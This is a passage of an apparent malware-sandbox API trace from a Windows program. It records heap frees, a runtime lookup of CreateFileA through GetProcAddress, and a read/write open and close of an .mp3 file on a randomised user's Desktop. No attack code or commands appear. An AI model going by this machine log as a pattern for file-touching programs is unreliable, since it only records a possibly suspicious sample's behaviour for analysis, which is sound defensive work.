returned 1 [0075.980] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d6a8 | out: hHeap=0x650000) returned 1 [0075.980] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e0f0 | out: hHeap=0x650000) returned 1 [0075.980] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e240 | out: hHeap=0x650000) returned 1 [0075.980] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e558 | out: hHeap=0x650000) returned 1 [0075.980] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6908d0 | out: hHeap=0x650000) returned 1 [0075.980] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d748 | out: hHeap=0x650000) returned 1 [0075.980] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e3d8 | out: hHeap=0x650000) returned 1 [0075.980] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690940 | out: hHeap=0x650000) returned 1 [0075.980] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e180 | out: hHeap=0x650000) returned 1 [0075.980] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e438 | out: hHeap=0x650000) returned 1 [0075.980] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68cff0 | out: hHeap=0x650000) returned 1 [0075.980] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690900 | out: hHeap=0x650000) returned 1 [0075.981] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d680 | out: hHeap=0x650000) returned 1 [0075.981] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e4b0 | out: hHeap=0x650000) returned 1 [0075.981] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690740 | out: hHeap=0x650000) returned 1 [0075.981] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d7c0 | out: hHeap=0x650000) returned 1 [0075.981] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e468 | out: hHeap=0x650000) returned 1 [0075.981] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ad78 | out: hHeap=0x650000) returned 1 [0075.981] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d888 | out: hHeap=0x650000) returned 1 [0075.981] PeekMessageW (in: lpMsg=0x61f2d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f2d4) returned 0 [0075.981] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6b8978 | out: hHeap=0x650000) returned 1 [0075.981] PeekMessageW (in: lpMsg=0x61f2d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f2d4) returned 0 [0075.981] PeekMessageW (in: lpMsg=0x61f2d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f2d4) returned 0 [0075.981] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690740 [0075.981] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690900 [0075.981] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d888 [0075.981] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0075.981] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d888 | out: hHeap=0x650000) returned 1 [0075.981] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690900 | out: hHeap=0x650000) returned 1 [0075.981] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6908d0 | out: hHeap=0x650000) returned 1 [0075.981] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690940 | out: hHeap=0x650000) returned 1 [0075.981] PeekMessageW (in: lpMsg=0x61eeb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61eeb4) returned 0 [0075.981] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906d0 | out: hHeap=0x650000) returned 1 [0075.981] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906d0 | out: hHeap=0x650000) returned 1 [0075.981] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906d0 | out: hHeap=0x650000) returned 1 [0075.981] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906d0 | out: hHeap=0x650000) returned 1 [0075.981] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906d0 | out: hHeap=0x650000) returned 1 [0075.981] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906d0 | out: hHeap=0x650000) returned 1 [0075.981] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690910 | out: hHeap=0x650000) returned 1 [0075.981] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690910 | out: hHeap=0x650000) returned 1 [0075.981] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76df88 | out: hHeap=0x650000) returned 1 [0075.981] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e318 | out: hHeap=0x650000) returned 1 [0075.981] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d748 | out: hHeap=0x650000) returned 1 [0075.981] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906d0 | out: hHeap=0x650000) returned 1 [0075.982] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906d0 | out: hHeap=0x650000) returned 1 [0075.982] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68cff0 | out: hHeap=0x650000) returned 1 [0075.982] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906d0 | out: hHeap=0x650000) returned 1 [0075.982] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906d0 | out: hHeap=0x650000) returned 1 [0075.982] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906d0 | out: hHeap=0x650000) returned 1 [0075.982] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906d0 | out: hHeap=0x650000) returned 1 [0075.982] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906d0 | out: hHeap=0x650000) returned 1 [0075.982] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906d0 | out: hHeap=0x650000) returned 1 [0075.982] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906d0 | out: hHeap=0x650000) returned 1 [0075.982] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906d0 | out: hHeap=0x650000) returned 1 [0075.982] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x74b420 | out: hHeap=0x650000) returned 1 [0075.982] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906d0 | out: hHeap=0x650000) returned 1 [0075.982] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0075.982] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ad30 | out: hHeap=0x650000) returned 1 [0075.982] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690910 | out: hHeap=0x650000) returned 1 [0075.982] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b270 | out: hHeap=0x650000) returned 1 [0075.982] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690820 | out: hHeap=0x650000) returned 1 [0075.982] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b270 | out: hHeap=0x650000) returned 1 [0075.982] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690910 | out: hHeap=0x650000) returned 1 [0075.982] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ad30 | out: hHeap=0x650000) returned 1 [0075.982] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690700 | out: hHeap=0x650000) returned 1 [0075.982] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ad30 | out: hHeap=0x650000) returned 1 [0075.982] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690910 | out: hHeap=0x650000) returned 1 [0075.982] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b270 | out: hHeap=0x650000) returned 1 [0075.982] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6908e0 | out: hHeap=0x650000) returned 1 [0075.982] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b270 | out: hHeap=0x650000) returned 1 [0075.982] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690910 | out: hHeap=0x650000) returned 1 [0075.982] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ad30 | out: hHeap=0x650000) returned 1 [0075.982] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690970 | out: hHeap=0x650000) returned 1 [0075.982] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ad30 | out: hHeap=0x650000) returned 1 [0075.982] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690910 | out: hHeap=0x650000) returned 1 [0075.983] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b270 | out: hHeap=0x650000) returned 1 [0075.983] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690b40 | out: hHeap=0x650000) returned 1 [0075.983] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b270 | out: hHeap=0x650000) returned 1 [0075.983] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690910 | out: hHeap=0x650000) returned 1 [0075.983] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ad30 | out: hHeap=0x650000) returned 1 [0075.983] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690980 | out: hHeap=0x650000) returned 1 [0075.983] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ad30 | out: hHeap=0x650000) returned 1 [0075.983] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690910 | out: hHeap=0x650000) returned 1 [0075.983] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b270 | out: hHeap=0x650000) returned 1 [0075.983] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690770 | out: hHeap=0x650000) returned 1 [0075.983] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b270 | out: hHeap=0x650000) returned 1 [0075.983] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690910 | out: hHeap=0x650000) returned 1 [0075.983] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ad30 | out: hHeap=0x650000) returned 1 [0075.983] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690960 | out: hHeap=0x650000) returned 1 [0075.983] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76d30000 [0075.983] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0075.983] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x76b270, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0075.983] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b270 | out: hHeap=0x650000) returned 1 [0075.983] GetProcAddress (hModule=0x76d30000, lpProcName="CreateFile") returned 0x0 [0075.983] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ad30 | out: hHeap=0x650000) returned 1 [0075.983] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690960 | out: hHeap=0x650000) returned 1 [0075.983] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0075.983] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x76b270, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0075.983] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b270 | out: hHeap=0x650000) returned 1 [0075.983] GetProcAddress (hModule=0x76d30000, lpProcName="CreateFileA") returned 0x76d453c6 [0075.983] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ad30 | out: hHeap=0x650000) returned 1 [0075.984] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690910 | out: hHeap=0x650000) returned 1 [0075.984] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d748 | out: hHeap=0x650000) returned 1 [0075.984] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690960 | out: hHeap=0x650000) returned 1 [0075.984] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\6EgOrexJkDL7op.mp3", cchWideChar=57, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 57 [0075.984] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\6EgOrexJkDL7op.mp3", cchWideChar=57, lpMultiByteStr=0x74b420, cbMultiByte=57, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\6EgOrexJkDL7op.mp3", lpUsedDefaultChar=0x0) returned 57 [0075.984] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x74b420 | out: hHeap=0x650000) returned 1 [0075.984] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690960 | out: hHeap=0x650000) returned 1 [0075.984] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690910 | out: hHeap=0x650000) returned 1 [0075.984] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690660 | out: hHeap=0x650000) returned 1 [0075.984] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690790 | out: hHeap=0x650000) returned 1 [0075.984] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690920 | out: hHeap=0x650000) returned 1 [0075.984] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690780 | out: hHeap=0x650000) returned 1 [0075.984] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690810 | out: hHeap=0x650000) returned 1 [0075.984] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d748 | out: hHeap=0x650000) returned 1 [0075.984] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\6EgOrexJkDL7op.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\6egorexjkdl7op.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0075.984] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e600 | out: hHeap=0x650000) returned 1 [0075.984] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690780 | out: hHeap=0x650000) returned 1 [0075.984] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b270 | out: hHeap=0x650000) returned 1 [0075.984] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0x771fe8, cbMultiByte=57, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 57 [0075.984] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0x771fe8, cbMultiByte=57, lpWideCharStr=0x660098, cchWideChar=57 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\6EgOrexJkDL7op.mp3") returned 57 [0075.984] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e630 | out: hHeap=0x650000) returned 1 [0075.984] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x660098 | out: hHeap=0x650000) returned 1 [0075.984] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x771fe8 | out: hHeap=0x650000) returned 1 [0075.984] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e0c0 | out: hHeap=0x650000) returned 1 [0075.984] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690920 | out: hHeap=0x650000) returned 1 [0075.984] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e4e0 | out: hHeap=0x650000) returned 1 [0075.984] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b090 | out: hHeap=0x650000) returned 1 [0075.985] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690920 | out: hHeap=0x650000) returned 1 [0075.985] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e0c0 | out: hHeap=0x650000) returned 1 [0075.985] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e1c8 | out: hHeap=0x650000) returned 1 [0075.985] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690920 | out: hHeap=0x650000) returned 1 [0075.985] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b090 | out: hHeap=0x650000) returned 1 [0075.985] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e090 | out: hHeap=0x650000) returned 1 [0075.985] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690920 | out: hHeap=0x650000) returned 1 [0075.985] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e1c8 | out: hHeap=0x650000) returned 1 [0075.985] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e480 | out: hHeap=0x650000) returned 1 [0075.985] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690920 | out: hHeap=0x650000) returned 1 [0075.985] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e090 | out: hHeap=0x650000) returned 1 [0075.985] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e660 | out: hHeap=0x650000) returned 1 [0075.985] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690920 | out: hHeap=0x650000) returned 1 [0075.985] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e480 | out: hHeap=0x650000) returned 1 [0075.985] FreeLibrary (hLibModule=0x76d30000) returned 1 [0075.985] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690820 | out: hHeap=0x650000) returned 1 [0075.985] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690700 | out: hHeap=0x650000) returned 1 [0075.985] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6908e0 | out: hHeap=0x650000) returned 1 [0075.985] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690970 | out: hHeap=0x650000) returned 1 [0075.985] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690b40 | out: hHeap=0x650000) returned 1 [0075.985] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690980 | out: hHeap=0x650000) returned 1 [0075.985] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690770 | out: hHeap=0x650000) returned 1 [0075.985] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68cff0 | out: hHeap=0x650000) returned 1 [0075.985] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e300 | out: hHeap=0x650000) returned 1 [0075.985] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906d0 | out: hHeap=0x650000) returned 1 [0075.985] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e240 | out: hHeap=0x650000) returned 1 [0075.985] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e558 | out: hHeap=0x650000) returned 1 [0075.985] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e708 | out: hHeap=0x650000) returned 1 [0075.985] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e0f0 | out: hHeap=0x650000) returned 1 [0075.985] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b1c8 | out: hHeap=0x650000) returned 1 [0075.985] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76df70 | out: hHeap=0x650000) returned 1 [0075.985] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e678 | out: hHeap=0x650000) returned 1 [0075.986] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ac10 | out: hHeap=0x650000) returned 1 [0075.986] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e030 | out: hHeap=0x650000) returned 1 [0075.986] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e510 | out: hHeap=0x650000) returned 1 [0075.986] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e108 | out: hHeap=0x650000) returned 1 [0075.986] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e378 | out: hHeap=0x650000) returned 1 [0075.986] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e3c0 | out: hHeap=0x650000) returned 1 [0075.986] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76df88 | out: hHeap=0x650000) returned 1 [0075.986] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e318 | out: hHeap=0x650000) returned 1 [0075.986] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e690 | out: hHeap=0x650000) returned 1 [0075.986] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e078 | out: hHeap=0x650000) returned 1 [0075.986] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76dfa0 | out: hHeap=0x650000) returned 1 [0075.986] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e1f8 | out: hHeap=0x650000) returned 1 [0075.986] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e198 | out: hHeap=0x650000) returned 1 [0075.986] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b198 | out: hHeap=0x650000) returned 1 [0075.986] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76afe8 | out: hHeap=0x650000) returned 1 [0075.986] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b0f0 | out: hHeap=0x650000) returned 1 [0075.986] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76abe0 | out: hHeap=0x650000) returned 1 [0075.986] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e4c8 | out: hHeap=0x650000) returned 1 [0075.986] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e3f0 | out: hHeap=0x650000) returned 1 [0075.986] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b018 | out: hHeap=0x650000) returned 1 [0075.986] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e3a8 | out: hHeap=0x650000) returned 1 [0075.986] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6969c0 | out: hHeap=0x650000) returned 1 [0075.986] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6908d0 | out: hHeap=0x650000) returned 1 [0075.986] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690810 | out: hHeap=0x650000) returned 1 [0075.986] PeekMessageW (in: lpMsg=0x61eeb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61eeb4) returned 0 [0075.986] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690770 | out: hHeap=0x650000) returned 1 [0075.986] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690980 | out: hHeap=0x650000) returned 1 [0075.986] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f96e8 | out: hHeap=0x650000) returned 1 [0075.986] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690770 | out: hHeap=0x650000) returned 1 [0075.986] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690810 | out: hHeap=0x650000) returned 1 [0075.986] PeekMessageW (in: lpMsg=0x61eeb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61eeb4) returned 0 [0075.986] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690810 | out: hHeap=0x650000) returned 1 [0075.986] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690810 | out: hHeap=0x650000) returned 1 [0075.986] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690810 | out: hHeap=0x650000) returned 1 [0075.986] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690810 | out: hHeap=0x650000) returned 1 [0075.987] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690770 | out: hHeap=0x650000) returned 1 [0075.987] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690810 | out: hHeap=0x650000) returned 1 [0075.987] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0075.987] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e690 | out: hHeap=0x650000) returned 1 [0075.987] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690770 | out: hHeap=0x650000) returned 1 [0075.987] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e318 | out: hHeap=0x650000) returned 1 [0075.987] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690980 | out: hHeap=0x650000) returned 1 [0075.987] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e318 | out: hHeap=0x650000) returned 1 [0075.987] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690770 | out: hHeap=0x650000) returned 1 [0075.987] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e690 | out: hHeap=0x650000) returned 1 [0075.987] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690b40 | out: hHeap=0x650000) returned 1 [0075.987] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76d30000 [0075.987] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0075.987] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x76e318, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0075.987] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e318 | out: hHeap=0x650000) returned 1 [0075.987] GetProcAddress (hModule=0x76d30000, lpProcName="CloseHandle") returned 0x76d41410 [0075.987] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e690 | out: hHeap=0x650000) returned 1 [0075.987] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690b40 | out: hHeap=0x650000) returned 1 [0075.987] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690b40 | out: hHeap=0x650000) returned 1 [0075.987] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d770 | out: hHeap=0x650000) returned 1 [0075.987] CloseHandle (hObject=0x140) returned 1 [0075.987] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76df88 | out: hHeap=0x650000) returned 1 [0075.987] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690970 | out: hHeap=0x650000) returned 1 [0075.987] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e318 